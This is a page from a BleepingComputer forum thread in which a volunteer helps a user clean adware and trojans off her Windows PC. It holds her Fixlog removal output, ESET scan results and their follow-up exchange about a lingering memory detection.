"C:\Users\Karin Hostetler\AppData\Roaming\d.KvBEk.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\DgkIlaH.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\EaBiAea.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\EAyEynk.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\EDhbFIz.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\EygEhJE.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\FcfgK.l.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\fhIqKrG.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\FHm.CCw.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\Fkhvfuv.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\FkyDzBg.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\flwKCyx.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\FooEDIz.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\FqFql.I.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\G.zIGwn.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\gelfCgB.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\GK.xB.H.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\GuyFxhj.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\GyhgfDG.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\h.dA..r.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\H.FnrcA.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\hc.Ekso.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\hdpl.A..tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\hgJmzHc.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\hGmrugl.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\hHKvy.s.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\hHpH.vg.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\hKKAJt..tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\ianksBp.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\iewoixB.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\IlxrjIs.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\imec.rK.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\Io..gvn.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\IvocJvb.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\Ja.AJly.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\JBAeesf.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\jKsc.Db.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\kaampdk.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\KaAzBzg.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\KAJdHsx.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\kawiKkt.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\Kjvon.z.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\lfjDy.A.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\ljesr.e.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\migEyFu.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\myciaB..tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\nGtAkFz.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\oCGeaDq.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\pAsnGil.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\pddmtsw.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\pF.Fltn.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\pzvEJ.c.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\qcmJyrv.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\rGHtFCn.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\rGjizBd.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\swhi.Fm.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\tgIysyi.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\u.vBKhg.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\uebnfhx.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\uhhsnBd.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\vacfsmG.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\vCkilCq.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\vowws.H.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\x.fkmhm.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\xbfAl.r.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\yc.Kam..tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\ymybaBG.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\zatwfvJ.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\zBllBya.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\zIBKqww.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\zkKIqmK.tmp" => not found
"C:\Users\Karin Hostetler\AppData\Roaming\zmabqBm.tmp" => not found
C:\ProgramData\Temp => ":AB1A1E3D" ADS removed successfully
"HKU\S-1-5-21-1394640484-365018484-2708498470-1001\SOFTWARE\Microsoft\Internet
Explorer\SearchScopes\\DefaultScope" => removed successfully
HKU\S-1-5-21-1394640484-365018484-2708498470-1001\SOFTWARE\Microsoft\Internet
Explorer\SearchScopes\{B18C6A76-7C50-4965-9A1B-B109B920ADCD} => removed
successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP
Query User{B5A12A77-2103-48C0-B36D-984E39636A68}C:\users\karin
hostetler\appdata\local\liscio\app-1.0.1\liscio.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP
Query User{C8669CBA-D698-4654-B81A-2B14A9AB72F3}C:\users\karin
hostetler\appdata\local\liscio\app-1.0.1\liscio.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP
Query User{51C5DD6A-E83B-4BC3-ABFC-716A8DF92697}C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP
Query User{5B3CB77D-7C8D-4426-AF81-98921AC1C5B4}C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP
Query User{05AE48DE-AA5E-4919-80F8-76893F99556E}C:\users\karin
hostetler\appdata\local\temp\g2_2324\g2viewer.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP
Query User{F6FCDB82-142B-409C-BF5F-ADE31A08D795}C:\users\karin
hostetler\appdata\local\temp\g2_2324\g2viewer.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP
Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files
(x86)\mobisynapse\mobisynapse.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP
Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files
(x86)\mobisynapse\mobisynapse.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP
Query User{5111D219-0C0F-4233-A42C-819264AD54A8}C:\program files
(x86)\mobisynapse\mobisynapse.exe" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP
Query User{012F3B51-9801-4889-A822-FB8B00F4B624}C:\program files
(x86)\mobisynapse\mobisynapse.exe" => not found
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP
Query User{F907B127-94C2-47D0-9A7E-4B0B9EE01372}C:\users\karin
hostetler\appdata\local\temp\g2_2329\g2viewer.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP
Query User{FB10B806-8BB0-4FB9-A223-2B6AEF749C05}C:\users\karin
hostetler\appdata\local\temp\g2_2329\g2viewer.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP
Query User{90C1ECD6-3651-4A40-9E84-086E1F6B159E}C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP
Query User{CD2CF4D2-6665-4D3B-9AAA-DDBB344E277C}C:\program files
(x86)\mobisynapse\mobisynapsesynchelper.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP
Query User{806E6120-074E-4858-A443-3CCE548E0FDD}C:\program files\mozilla
firefox\firefox.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP
Query User{93BA9D74-3E49-4A0B-949F-4403A1FD2F07}C:\program files\mozilla
firefox\firefox.exe" => removed successfully
"C:\ProgramData\milon.com" => not found
"C:\ProgramData\ddond.com" => not found
C:\Users\Karin Hostetler\AppData\Local\Microsoft Vision => moved successfully
"C:\Users\Karin Hostetler\AppData\Local\mbam" => not found
"C:\Users\Karin Hostetler\AppData\Local\Temp" folder move:
Could not move "C:\Users\Karin Hostetler\AppData\Local\Temp" => Scheduled to
move on reboot.
C:\ProgramData\Temp => moved successfully
=========== "C:\Users\Karin Hostetler\AppData\Roaming\*.tmp" ==========
C:\Users\Karin Hostetler\AppData\Roaming\.hxAIsa.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\bd.rJIC.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\DckGdea.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\itapowq.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\kGuDepI.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\kk.eKk..tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\qBsHy.t.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\ufxiGDB.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\wJEAH.D.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\wvFqolG.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\ymwjjBw.tmp => moved successfully
C:\Users\Karin Hostetler\AppData\Roaming\zuKyJyr.tmp => moved successfully
========= End -> "C:\Users\Karin Hostetler\AppData\Roaming\*.tmp" ========
Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 24-03-2022
09:46:45)
C:\Users\Karin Hostetler\AppData\Local\Temp => Could not move
==== End of Fixlog 09:46:51 ====
Thank you again!!!! I truly, truly appreciate your help!
Karin
* Back to top
--------------------------------------------------------------------------------
#6 OH MY!
Oh My!
Adware and Spyware and Malware
*
* Malware Response Instructor
* 49,691 posts
* OFFLINE
* Gender:Male
* Location:California
* Local time:11:27 AM
Posted 24 March 2022 - 09:37 AM
You are quite welcome Karin.
We took quite a bite out of things.
Please do this.
===================================================
ESET Online Scanner
--------------------
Note: You can expect this process to take a long time, up to several hours or
more.
* Download ESET Free Online Scanner and save it to your Desktop
* Right click on esetonlinescanner_enu.exe and select Run as administrator
* Click Computer Scan
* Click Full scan
* Select Enable ESET to detect and quarantine potentially unwanted applications
* Click Start scan
* Once completed click Save scan log and save it to your Desktop as
ESETScan.txt
* Click Continue then finally click Close
* Copy and paste the ESETScan.txt file contents in your reply
===================================================
Things I would like to see in your next reply. Please be sure to copy and paste
any requested log information unless you are asked to attach it.
* ESET report
* Update on computer performance
Gary
"Lord, to whom would we go? You have the words that give eternal life. We
believe, and we know you are the Holy One of God." Where to Start
* Back to top
--------------------------------------------------------------------------------
#7 KTAIT80
ktait80
* Topic Starter
*
* Members
* 30 posts
* ONLINE
* Local time:02:27 PM
Posted 24 March 2022 - 08:15 PM
Hi Gary,
Took 9 hours, (scanned my external hard drive also)
3/24/2022 21:11:14 PM
Files scanned: 874277
Detected files: 19
Cleaned files: 19
Total scan time 09:18:41
Scan status: Finished
C:\AdwCleaner\Quarantine\v1\20220324.090337\10\Host App
Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\11\Host App
Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\12\Host App
Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\13\Host App
Service\Engine\HostAppServiceUpdater (1).exe#B3D56172C1308D4E a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\13\Host App
Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\14\Host App
Service\Engine\HostAppServiceUpdater (1).exe#B3D56172C1308D4E a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\14\Host App
Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\15\Host App
Service\Engine\HostAppServiceUpdater (1).exe#B3D56172C1308D4E a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\15\Host App
Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\16\Host App Service\Uninstall
(1).exe#895879AA94E52644 a variant of Win32/Pokki.A potentially unwanted
application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\18\Host App
Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\19\Host App
Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\20\Host App
Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\AdwCleaner\Quarantine\v1\20220324.090337\9\Host App
Service\Engine\HostAppServiceUpdater.exe#FA6841909C8E267B a variant of
Win64/Pokki.B potentially unwanted application cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\113W82LC\00Back[1].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\5XSIB6Q6\00Back[1].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\JUGFXMVD\00Back[1].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin Hostetler\defaultuser0\AppData\Local\Host App
Service\Engine\HostAppServiceUpdater.exe a variant of Win64/Pokki.B potentially
unwanted application cleaned by deleting
Operating memory a variant of Win32/Agent.TJS trojan retained
* Back to top
--------------------------------------------------------------------------------
#8 OH MY!
Oh My!
Adware and Spyware and Malware
*
* Malware Response Instructor
* 49,691 posts
* OFFLINE
* Gender:Male
* Location:California
* Local time:11:27 AM
Posted 24 March 2022 - 09:01 PM
ESET is very thorough and worth the wait.
Things are looking good. Are there any remaining questions or concerns you might
have before I post some tool/log clean up instructions and other information for
you to consider going forward?
Gary
"Lord, to whom would we go? You have the words that give eternal life. We
believe, and we know you are the Holy One of God." Where to Start
* Back to top
--------------------------------------------------------------------------------
#9 KTAIT80
ktait80
* Topic Starter
*
* Members
* 30 posts
* ONLINE
* Local time:02:27 PM
Posted 24 March 2022 - 09:13 PM
HI Gary,
Thorough is an understatement.... lol.
My only question was the final line
Operating memory a variant of Win32/Agent.TJS trojan retained
Is this something to be concerned about?
Other than that, I don't think I have anything else to ask.
I do want to thank you again for all of your help. I know that this is a
volunteer situation and I truly appreciate all of your time and effort.
Thank you again!
Karin
* Back to top
--------------------------------------------------------------------------------
#10 OH MY!
Oh My!
Adware and Spyware and Malware
*
* Malware Response Instructor
* 49,691 posts
* OFFLINE
* Gender:Male
* Location:California
* Local time:11:27 AM
Posted 24 March 2022 - 09:44 PM
Greetings Karin.
No, I don't believe that is of concern when the remainder of your computer is
malware free. That detection is normally associated with a malicious program
that loads information into the memory to facilitate interfering with normal
computer/program behavior. We can run additional scans if you'd like, or even
run ESET again to see if it is detected again.
Gary
"Lord, to whom would we go? You have the words that give eternal life. We
believe, and we know you are the Holy One of God." Where to Start
* Back to top
--------------------------------------------------------------------------------
#11 KTAIT80
ktait80
* Topic Starter
*
* Members
* 30 posts
* ONLINE
* Local time:02:27 PM
Posted 24 March 2022 - 09:58 PM
Hi Gary,
I think I'll rerun the ESET. Hopefully it will be gone. I set it for a custom
scan of the actual desktop and disregarded the external harddrive. I hope that
wasn't a dumb move
* Back to top
--------------------------------------------------------------------------------
#12 OH MY!
Oh My!
Adware and Spyware and Malware
*
* Malware Response Instructor
* 49,691 posts
* OFFLINE
* Gender:Male
* Location:California
* Local time:11:27 AM
Posted 24 March 2022 - 10:06 PM
No, that is perfectly fine.
Gary
"Lord, to whom would we go? You have the words that give eternal life. We
believe, and we know you are the Holy One of God." Where to Start
* Back to top
--------------------------------------------------------------------------------
#13 KTAIT80
ktait80
* Topic Starter
*
* Members
* 30 posts
* ONLINE
* Local time:02:27 PM
Posted 24 March 2022 - 10:25 PM
I'll let you know in the morning 6AM is only 6.5 hrs away and this old girl
needs to get some rest.
Thanks so much for all of your help, you have NO idea how much I appreciate it.
I know it's volunteer, but do you have a favorite charity or cause that could
use a donation? I'd like to pay this forward SOMEHOW.
* Back to top
--------------------------------------------------------------------------------
#14 KTAIT80
ktait80
* Topic Starter
*
* Members
* 30 posts
* ONLINE
* Local time:02:27 PM
Posted 25 March 2022 - 07:35 AM
uh oh ???
3/25/2022 8:13:39 AM
Files scanned: 771842
Detected files: 10
Cleaned files: 10
Total scan time 08:58:46
Scan status: Finished
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\113W82LC\00Back[1].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\5XSIB6Q6\00Back[1].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\5XSIB6Q6\00Back[2].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\5XSIB6Q6\00Back[3].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\5XSIB6Q6\00Back[4].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\GC43WY82\00Back[1].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\JUGFXMVD\00Back[1].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\JUGFXMVD\00Back[2].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin
Hostetler\AppData\Local\Microsoft\Windows\INetCache\IE\JUGFXMVD\00Back[3].htm
JS/TrojanDownloader.Agent.YHB trojan cleaned by deleting
C:\Users\Karin Hostetler\AppData\Roaming\Microsoft\Office\Recent\file.url
LNK/Agent.CH trojan cleaned by deleting
* Back to top
--------------------------------------------------------------------------------
#15 OH MY!
Oh My!
Adware and Spyware and Malware
*
* Malware Response Instructor
* 49,691 posts
* OFFLINE
* Gender:Male
* Location:California
* Local time:11:27 AM
Posted 25 March 2022 - 07:47 AM
Good Morning Karin.
Yes, I do have an idea about appreciation. Years ago I stumbled upon
BleepingComputer in my own time of need and was so impressed with the site and
the kindness of the people who solved my issues I decided to enter the training
program to become a helper. I try never to forget the sinking feeling of not
knowing what to do to resolve my computer problem.
There is no real need to pay it forward but I realize some people want to
express appreciation in that way. I am also a volunteer with a radio ministry,
Truth for Life, that has played an important role in my life for 20+ years. The
true primary reason for me being at this site is so that I can subtly proclaim
my Savior and what He has done for me, as is referenced in my signature line.
Getting back to business, I am interested to see the ESET results. Quite
honestly, I have never seen that type of reference to memory corruption.
Gary
"Lord, to whom would we go? You have the words that give eternal life. We
believe, and we know you are the Holy One of God." Where to Start
* Back to top
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
* Page 1 of 4
* 1
* 2
* 3
* Next
* »
Back to Virus, Trojan, Spyware, and Malware Removal Help
*
*
*
*
*
*
*
*
*
*
1 USER(S) ARE READING THIS TOPIC
1 members, 0 guests, 0 anonymous users
ktait80
Reply to quoted posts Clear
1. BleepingComputer.com
2. → Security
3. → Virus, Trojan, Spyware, and Malware Removal Help
4. Privacy Policy
5. Rules ·
*
* Help
Advertise | About Us | Terms of Use | Privacy Policy | Sitemap
| Chat | RSS Feeds | Contact Us Tech Support Forums | Virus
Removal Guides | Downloads | Tutorials | The Computer Glossary |
Uninstall List | Startups | The File Database
© 2004-2022 All Rights Reserved Bleeping Computer LLC .
Site Changelog
Community Forum Software by IP.Board
SIGN IN
* Use Twitter
* Need an account? Register now!
* Username
* Forum Password
I've forgotten my password
* Remember me
This is not recommended for shared computers
* Sign in anonymously
Don't add me to the active users list
* Privacy Policy
JUMP TO PAGE
JUMP TO PAGE